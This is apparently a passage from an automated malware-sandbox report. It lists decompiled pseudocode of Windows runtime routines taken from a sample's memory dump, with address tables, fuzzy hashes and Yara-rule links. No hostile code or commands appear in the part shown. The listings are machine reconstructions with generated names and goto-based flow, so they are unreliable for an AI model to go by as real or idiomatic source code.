																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x18a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x18a7b84 = _t75;
						_t73 = E017CEB70(_t134, 0x18a7b60);
						if( *0x18a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E017CFF60( *0x18a7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                    0x017efab0
                                                    0x017efab2
                                                    0x017efab3
                                                    0x017efab4
                                                    0x017efabc
                                                    0x017efac0
                                                    0x017efb14
                                                    0x017efb17
                                                    0x017efac2
                                                    0x017efac8
                                                    0x017efacd
                                                    0x017efad3
                                                    0x017efad3
                                                    0x017efadd
                                                    0x017efb18
                                                    0x017efb1b
                                                    0x017efb1d
                                                    0x017efb1e
                                                    0x017efb1f
                                                    0x017efb20
                                                    0x017efb21
                                                    0x017efb22
                                                    0x017efb23
                                                    0x017efb24
                                                    0x017efb25
                                                    0x017efb26
                                                    0x017efb27
                                                    0x017efb28
                                                    0x017efb29
                                                    0x017efb2a
                                                    0x017efb2b
                                                    0x017efb2c
                                                    0x017efb2d
                                                    0x017efb2e
                                                    0x017efb2f
                                                    0x017efb3a
                                                    0x017efb3b
                                                    0x017efb3e
                                                    0x017efb41
                                                    0x017efb44
                                                    0x017efb47
                                                    0x017efb4a
                                                    0x017efb4d
                                                    0x017efb53
                                                    0x0182bdcb
                                                    0x0182bdcb
                                                    0x017efb59
                                                    0x017efb5b
                                                    0x017efb5b
                                                    0x017efb5e
                                                    0x0182bdd5
                                                    0x0182bdd8
                                                    0x00000000
                                                    0x0182bdda
                                                    0x00000000
                                                    0x0182bdda
                                                    0x017efb64
                                                    0x017efb64
                                                    0x017efb64
                                                    0x017efb67
                                                    0x017efb6e
                                                    0x017efb70
                                                    0x017efb72
                                                    0x00000000
                                                    0x017efb78
                                                    0x017efb7a
                                                    0x017efb7a
                                                    0x017efb7d
                                                    0x017efb80
                                                    0x0182bddf
                                                    0x0182bde1
                                                    0x00000000
                                                    0x0182bde3
                                                    0x00000000
                                                    0x0182bde3
                                                    0x017efb86
                                                    0x017efb86
                                                    0x017efb86
                                                    0x017efb8b
                                                    0x017efb90
                                                    0x017efb92
                                                    0x017efb94
                                                    0x017efb9a
                                                    0x017efb9b
                                                    0x017efba1
                                                    0x0182bde8
                                                    0x0182bdeb
                                                    0x0182bded
                                                    0x0182beb5
                                                    0x0182beb5
                                                    0x0182bebb
                                                    0x0182bebd
                                                    0x0182bec3
                                                    0x0182bed2
                                                    0x0182bedd
                                                    0x0182bedd
                                                    0x0182beed
                                                    0x00000000
                                                    0x0182bdf3
                                                    0x0182bdfe
                                                    0x0182be06
                                                    0x0182be0b
                                                    0x0182be0d
                                                    0x0182be0f
                                                    0x0182be14
                                                    0x0182be19
                                                    0x0182be20
                                                    0x0182be25
                                                    0x0182be27
                                                    0x0182be35
                                                    0x0182be39
                                                    0x0182be46
                                                    0x0182be4f
                                                    0x0182be54
                                                    0x0182be56
                                                    0x0182bef8
                                                    0x0182bef8
                                                    0x00000000
                                                    0x0182be5c
                                                    0x0182be5c
                                                    0x0182be60
                                                    0x00000000
                                                    0x0182be66
                                                    0x0182be66
                                                    0x0182be7f
                                                    0x0182be84
                                                    0x0182be87
                                                    0x0182be89
                                                    0x0182be8b
                                                    0x0182be99
                                                    0x0182be9d
                                                    0x0182bea0
                                                    0x0182beac
                                                    0x0182beaf
                                                    0x0182beb1
                                                    0x0182beb3
                                                    0x0182beb3
                                                    0x00000000
                                                    0x0182bea2
                                                    0x0182bea2
                                                    0x00000000
                                                    0x0182bea2
                                                    0x0182be8d
                                                    0x0182be8d
                                                    0x0182be92
                                                    0x00000000
                                                    0x0182be92
                                                    0x0182be8b
                                                    0x0182be60
                                                    0x0182be3b
                                                    0x0182be3b
                                                    0x0182be3e
                                                    0x00000000
                                                    0x0182be40
                                                    0x0182be40
                                                    0x0182be44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0182be44
                                                    0x0182be3e
                                                    0x0182be29
                                                    0x0182be29
                                                    0x00000000
                                                    0x0182be29
                                                    0x0182be27
                                                    0x00000000
                                                    0x017efba7
                                                    0x017efba7
                                                    0x017efbab
                                                    0x0182bf02
                                                    0x017efbb1
                                                    0x017efbb1
                                                    0x017efbb8
                                                    0x017efbbd
                                                    0x017efbbd
                                                    0x017efbbf
                                                    0x017efbbf
                                                    0x017efbc5
                                                    0x017efbcb
                                                    0x017efbf8
                                                    0x017efbf8
                                                    0x017efbfa
                                                    0x00000000
                                                    0x017efc00
                                                    0x017efc00
                                                    0x017efc03
                                                    0x00000000
                                                    0x017efc09
                                                    0x017efc09
                                                    0x017efc0f
                                                    0x017efc15
                                                    0x017efc23
                                                    0x017efc23
                                                    0x017efc25
                                                    0x017efc27
                                                    0x017efc75
                                                    0x017efc7c
                                                    0x017efc84
                                                    0x00000000
                                                    0x017efc29
                                                    0x017efc29
                                                    0x017efc2d
                                                    0x017efc30
                                                    0x0182bf0f
                                                    0x00000000
                                                    0x017efc36
                                                    0x017efc38
                                                    0x017efc3b
                                                    0x017efc41
                                                    0x0182bf17
                                                    0x0182bf19
                                                    0x0182bf48
                                                    0x0182bf4b
                                                    0x00000000
                                                    0x0182bf1b
                                                    0x0182bf22
                                                    0x0182bf24
                                                    0x0182bf26
                                                    0x00000000
                                                    0x0182bf2c
                                                    0x0182bf37
                                                    0x0182bf39
                                                    0x0182bf3b
                                                    0x00000000
                                                    0x0182bf41
                                                    0x0182bf41
                                                    0x0182bf41
                                                    0x0182bf41
                                                    0x0182bf45
                                                    0x00000000
                                                    0x0182bf45
                                                    0x0182bf3b
                                                    0x0182bf26
                                                    0x00000000
                                                    0x017efc47
                                                    0x017efc47
                                                    0x017efc49
                                                    0x017efcb2
                                                    0x017efcb4
                                                    0x017efcb6
                                                    0x017efcdc
                                                    0x017efcdc
                                                    0x00000000
                                                    0x017efcb8
                                                    0x017efcc3
                                                    0x017efcc5
                                                    0x017efcc7
                                                    0x00000000
                                                    0x017efcc9
                                                    0x017efcc9
                                                    0x017efccd
                                                    0x00000000
                                                    0x017efccd
                                                    0x017efcc7
                                                    0x00000000
                                                    0x017efc4b
                                                    0x017efc4b
                                                    0x017efc4e
                                                    0x017efc4e
                                                    0x017efc51
                                                    0x017efc51
                                                    0x017efc54
                                                    0x017efc5a
                                                    0x017efc5c
                                                    0x017efc5f
                                                    0x017efc61
                                                    0x017efc63
                                                    0x017efc65
                                                    0x017efc67
                                                    0x017efc6e
                                                    0x017efc72
                                                    0x017efc72
                                                    0x017efc72
                                                    0x017efc72
                                                    0x017efc67
                                                    0x017efc61
                                                    0x00000000
                                                    0x017efc5a
                                                    0x017efc49
                                                    0x017efc41
                                                    0x017efc30
                                                    0x017efc27
                                                    0x017efc03
                                                    0x017efbcd
                                                    0x017efbd3
                                                    0x017efbd9
                                                    0x017efbdc
                                                    0x017efbde
                                                    0x017efc99
                                                    0x017efc9b
                                                    0x017efc9d
                                                    0x017efcd5
                                                    0x017efcd5
                                                    0x017efc89
                                                    0x017efc89
                                                    0x00000000
                                                    0x017efc9f
                                                    0x017efc9f
                                                    0x017efca3
                                                    0x00000000
                                                    0x017efca3
                                                    0x00000000
                                                    0x017efbe4
                                                    0x017efbe4
                                                    0x017efbe4
                                                    0x017efbe4
                                                    0x017efbe9
                                                    0x017efbf2
                                                    0x00000000
                                                    0x017efbf2
                                                    0x017efbde
                                                    0x017efbcb
                                                    0x017efbab
                                                    0x017efc8b
                                                    0x017efc8b
                                                    0x017efc8c
                                                    0x017efb80
                                                    0x017efb72
                                                    0x017efb5e
                                                    0x017efc8d
                                                    0x017efc91
                                                    0x017efadf
                                                    0x017efadf
                                                    0x017efae1
                                                    0x017efae4
                                                    0x017efae7
                                                    0x017efaec
                                                    0x017efaf8
                                                    0x017efb00
                                                    0x017efb07
                                                    0x017efb0f
                                                    0x017efb0f
                                                    0x017efb07
                                                    0x00000000
                                                    0x017efaf8
                                                    0x017efadd

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0182BE0F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
                                                    • Instruction ID: 08249bcc81e9be563ee7e32b974bc71c05e5311a82c140dd706a3e2e9a2bd6ac
                                                    • Opcode Fuzzy Hash: 3a9521fd358905eceec613e118539eca23049befb6bcae241e491e1cc5a3b3f2
                                                    • Instruction Fuzzy Hash: 2EA14871B016168BEB26CF6CC458BBAF7E5AF4C710F14456DDA06CBA91EB30D941CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 63%
                                                    			E017B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x18a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x18a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017F97C0();
				}
				if( *0x18a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E017E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E017D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0184FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E017EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0180DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x18a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x18a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E017D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E017D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01837016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0184FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x18a5350;
							if(_t109 != 0x18a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0184FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01845720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                    0x017b2d8a
                                                    0x017b2d8a
                                                    0x017b2d92
                                                    0x017b2d96
                                                    0x017b2d9e
                                                    0x017b2da0
                                                    0x017b2da3
                                                    0x017b2da5
                                                    0x017b2da8
                                                    0x017b2dab
                                                    0x017b2db2
                                                    0x0180f9aa
                                                    0x0180f9ab
                                                    0x0180f9ae
                                                    0x0180f9ae
                                                    0x017b2db8
                                                    0x017b2dc2
                                                    0x0180f9b9
                                                    0x0180f9be
                                                    0x0180f9bf
                                                    0x0180f9bf
                                                    0x017b2dcf
                                                    0x0180f9c9
                                                    0x017b2dd5
                                                    0x017b2dd5
                                                    0x017b2dd5
                                                    0x017b2dde
                                                    0x017b2de1
                                                    0x017b2e70
                                                    0x017b2e72
                                                    0x017b2e72
                                                    0x017b2de7
                                                    0x017b2deb
                                                    0x017b2e7c
                                                    0x017b2e83
                                                    0x017b2e85
                                                    0x017b2e8b
                                                    0x017b2e8d
                                                    0x017b2e92
                                                    0x017b2e92
                                                    0x017b2e85
                                                    0x017b2df1
                                                    0x017b2df7
                                                    0x017b2df9
                                                    0x017b2df9
                                                    0x017b2dfc
                                                    0x017b2dff
                                                    0x017b2e02
                                                    0x00000000
                                                    0x017b2e05
                                                    0x017b2e0c
                                                    0x0180f9d9
                                                    0x017b2e12
                                                    0x017b2e12
                                                    0x017b2e12
                                                    0x017b2e1a
                                                    0x0180f9e3
                                                    0x0180f9e9
                                                    0x0180f9f0
                                                    0x0180f9f6
                                                    0x0180f9f8
                                                    0x0180f9f8
                                                    0x0180f9f0
                                                    0x017b2e23
                                                    0x0180fa02
                                                    0x0180fa03
                                                    0x0180fa05
                                                    0x0180fa06
                                                    0x00000000
                                                    0x017b2e29
                                                    0x017b2e29
                                                    0x017b2e2e
                                                    0x017b2e34
                                                    0x017b2e3e
                                                    0x00000000
                                                    0x00000000
                                                    0x017b2e44
                                                    0x017b2e47
                                                    0x017b2e4d
                                                    0x00000000
                                                    0x00000000
                                                    0x017b2e4f
                                                    0x017b2e54
                                                    0x00000000
                                                    0x00000000
                                                    0x017b2e5a
                                                    0x017b2e5f
                                                    0x017b2e9a
                                                    0x017b2ea4
                                                    0x017b2ea5
                                                    0x017b2ea8
                                                    0x017b2eaf
                                                    0x017b2eb2
                                                    0x017b2eb5
                                                    0x0180fae9
                                                    0x0180faeb
                                                    0x0180faed
                                                    0x0180faef
                                                    0x0180faf7
                                                    0x0180faf8
                                                    0x0180fafd
                                                    0x0180faff
                                                    0x0180fb04
                                                    0x0180fb04
                                                    0x0180faff
                                                    0x017b2ec0
                                                    0x017b2ec4
                                                    0x017b2ec6
                                                    0x017b2ec8
                                                    0x0180fb14
                                                    0x0180fb18
                                                    0x0180fb1e
                                                    0x0180fb21
                                                    0x0180fb21
                                                    0x017b2ece
                                                    0x017b2ece
                                                    0x017b2ece
                                                    0x017b2ed7
                                                    0x017b2e61
                                                    0x017b2e63
                                                    0x0180fa6b
                                                    0x0180fa71
                                                    0x0180fa76
                                                    0x0180fa78
                                                    0x0180fa8a
                                                    0x0180fa7a
                                                    0x0180fa83
                                                    0x0180fa83
                                                    0x0180fa8f
                                                    0x0180fa91
                                                    0x0180fa97
                                                    0x0180fa9d
                                                    0x0180faa4
                                                    0x0180faaa
                                                    0x0180faaf
                                                    0x0180fab1
                                                    0x0180fac3
                                                    0x0180fab3
                                                    0x0180fabc
                                                    0x0180fabc
                                                    0x0180fac8
                                                    0x0180facb
                                                    0x0180fadf
                                                    0x0180fadf
                                                    0x0180facb
                                                    0x0180faa4
                                                    0x0180fa91
                                                    0x017b2e6f
                                                    0x017b2e6f
                                                    0x017b2e5f
                                                    0x0180fa13
                                                    0x0180fa15
                                                    0x0180fa17
                                                    0x0180fa1f
                                                    0x0180fa21
                                                    0x0180fa22
                                                    0x0180fa25
                                                    0x0180fa28
                                                    0x0180fa2f
                                                    0x0180fa2f
                                                    0x0180fa2a
                                                    0x0180fa2a
                                                    0x0180fa2a
                                                    0x0180fa31
                                                    0x0180fa34
                                                    0x0180fa36
                                                    0x0180fa3c
                                                    0x0180fa3e
                                                    0x0180fa41
                                                    0x0180fa43
                                                    0x0180fa45
                                                    0x0180fa45
                                                    0x0180fa41
                                                    0x0180fa3c
                                                    0x0180fa4a
                                                    0x0180fa4f
                                                    0x0180fa51
                                                    0x0180fa53
                                                    0x0180fa56
                                                    0x0180fa5b
                                                    0x0180fa5e
                                                    0x00000000
                                                    0x0180fa5e
                                                    0x017b2e23

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
                                                    • Instruction ID: 498ce3847208f577461d3ff0315e0759879e5dadf4694de996232876eb13ea7f
                                                    • Opcode Fuzzy Hash: 4dd5e14b55ff2e8416b85cf3fe4722e77167c7a93b81fbddadee420c72f96286
                                                    • Instruction Fuzzy Hash: 12612831A016099FEB33DF6CC888BBEB7A4EB44714F144699E611D72C2C734AA81C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01880EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E01880EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0187FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01881074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E017F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0187A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0187A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x18a8b04 >> 0x14) + (_v44 -  *0x18a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E017D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0187138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E017D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0186FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x18a8724 & 0x00000008) != 0) {
						E018752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018815B5(0x18a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                    0x01880eb7
                                                    0x01880eb9
                                                    0x01880ec0
                                                    0x01880ec2
                                                    0x01880ecd
                                                    0x0188105b
                                                    0x0188105b
                                                    0x01881061
                                                    0x01881066
                                                    0x01881066
                                                    0x0188106b
                                                    0x01881073
                                                    0x01881073
                                                    0x01880ed3
                                                    0x01880ed6
                                                    0x01880edc
                                                    0x01880ee0
                                                    0x01880ee7
                                                    0x01880ef0
                                                    0x01880ef5
                                                    0x01880efa
                                                    0x01880efc
                                                    0x01880efd
                                                    0x01880f03
                                                    0x01880f04
                                                    0x01880f06
                                                    0x01880f07
                                                    0x01880f09
                                                    0x01880f0e
                                                    0x01880f14
                                                    0x01880f23
                                                    0x01880f2d
                                                    0x01880f34
                                                    0x01880f34
                                                    0x01880f14
                                                    0x01880f52
                                                    0x00000000
                                                    0x00000000
                                                    0x01880f58
                                                    0x01880f73
                                                    0x01880f74
                                                    0x01880f79
                                                    0x01880f7d
                                                    0x01880f80
                                                    0x01880f86
                                                    0x01880fab
                                                    0x01880fb5
                                                    0x01880fc6
                                                    0x01880fd1
                                                    0x01880fe3
                                                    0x01880fd3
                                                    0x01880fdc
                                                    0x01880fdc
                                                    0x01880feb
                                                    0x01881009
                                                    0x01881009
                                                    0x01881015
                                                    0x01881027
                                                    0x01881017
                                                    0x01881020
                                                    0x01881020
                                                    0x0188102f
                                                    0x0188103c
                                                    0x0188103c
                                                    0x01881048
                                                    0x01881050
                                                    0x01881050
                                                    0x01881055
                                                    0x00000000
                                                    0x01881055
                                                    0x01880f88
                                                    0x01880f9e
                                                    0x01880fa2
                                                    0x01880fa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01880fa9
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
                                                    • Instruction ID: a4207ef6d4ca2431f07848a641391afd23f1d5110b1d369d4c0b1b0ed0427c4c
                                                    • Opcode Fuzzy Hash: 71e61d3f773a2c431fcda4ce209e3a1a222ea7d064000430284080cdf3c771f4
                                                    • Instruction Fuzzy Hash: EC5181713043429FE325EF18D984B1BBBE5EBC4714F04492CF696D7291DA71EA0ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E017EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E017D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017F95D0();
							goto L11;
						} else {
							_t109 = L017D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017F95D0();
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                    0x017ef0d3
                                                    0x017ef0d9
                                                    0x017ef0e0
                                                    0x017ef0e7
                                                    0x017ef0f2
